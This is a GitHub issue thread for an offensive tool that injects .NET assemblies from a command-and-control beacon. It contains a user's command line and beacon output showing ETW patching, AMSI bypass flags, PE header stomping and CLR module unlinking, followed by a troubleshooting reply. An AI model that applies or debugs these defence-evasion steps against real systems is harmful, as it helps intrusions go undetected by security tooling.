search

med0x2e / ExecuteAssembly

Load/Inject .NET assemblies by; reusing the host (spawnto) process loaded CLR AppDomainManager, Stomping Loader/.NET assembly PE DOS headers, Unlinking .NET related modules, bypassing ETW+AMSI, avoiding EDR hooks via NT static syscalls (x64) and hiding imports by dynamically resolving APIs (hash).
542 stars 107 forks source link

Execution fails when using '--stomp-headers' #3

Open A32AN opened 3 years ago

A32AN commented 3 years ago

Hi,

I'm seeing failures when using the "--stomp-headers" arguments. I'm using the following command line: ExecuteAssembly --dotnetassembly /tmp/Seatbelt.exe --unlink-modules --etw --asmi --stomp-headers

Which results in something like this: * Tasked beacon to run: @args * Tasked beacon to spawn x86 features to: %windir%\SysWOW64\ScriptRunner.exe * Tasked beacon to spawn x64 features to: %windir%\sysnative\ScriptRunner.exe * Tasked beacon to spawn .NET Assembly /tmp/Seatbelt.exe' [+] host called home, sent: 85 bytes [+] host called home, sent: 480116 bytes [+] received output:

[i]: .NET Assembly Length: 548352 bytes [+]: Parsing Arguments : [i]: Args count: 1 [+]: Base64 Decoding & Decompressing .NET Assembly... [+]: Base64 Decoding & Decompressing Done.

[+]: Patching ETW... [+]: Retrieving EtwEvenWrite Address from NTDLL... [+]: NTDLL.DLL Module Base Address: 0xfeea0000 [+]: EtwEvenWrite Export located at Address: 0xfeef2d50 [+]: Patching EtwEvenWrite 0xfeef2d50 [+]: ETW Patchine Done.

[+]: Enumerating Loaded CLR versions [+]: Scanning for any loaded modules with the name 'clr', 'mscoree'... [+] Unlinking CLR related modules from PEB [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll [i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll [i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll [i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll

[+]: Obtaining a handle of the current process: 820 [+]: Scanning for PE DOS Header 'MZ...' pattern... [i]: 9 PE DOS Headers found. [+]: Stomping 9 PE DOS headers: [i]: Stomping MZ Header: 0xbfefeb80 [-]: Not a valid PE DOS Header [i]: Stomping MZ Header: 0x10009ac0 [i]: Stomping MZ Header: 0x6a7a0009 [i]: Stomping MZ Header: 0x6a7c2ed9 [i]: Stomping MZ Header: 0x6a9e0000 [i]: Stomping MZ Header: 0x6aa03cd0 [i]: Stomping MZ Header: 0x6c50ccb0 [i]: Stomping MZ Header: 0x6c600000 [i]: Stomping MZ Header: 0x6cfd0080

[!] pMethodInfo->Invoke_3(...) failed, hr = 80131604 [!]: Something went wrong.

If I leave out the --stomp-headers it all works flawlessly. EDIT: If i switch to the PEB walking methods header stomping works fine

med0x2e commented 3 years ago

Interesting, which Windows version and build you tried the "syscall" version of executeassembly on ?

A32AN commented 3 years ago

It's a 64 bit installation of Windows 10 Enterprise. Build number = 10.0.18363.0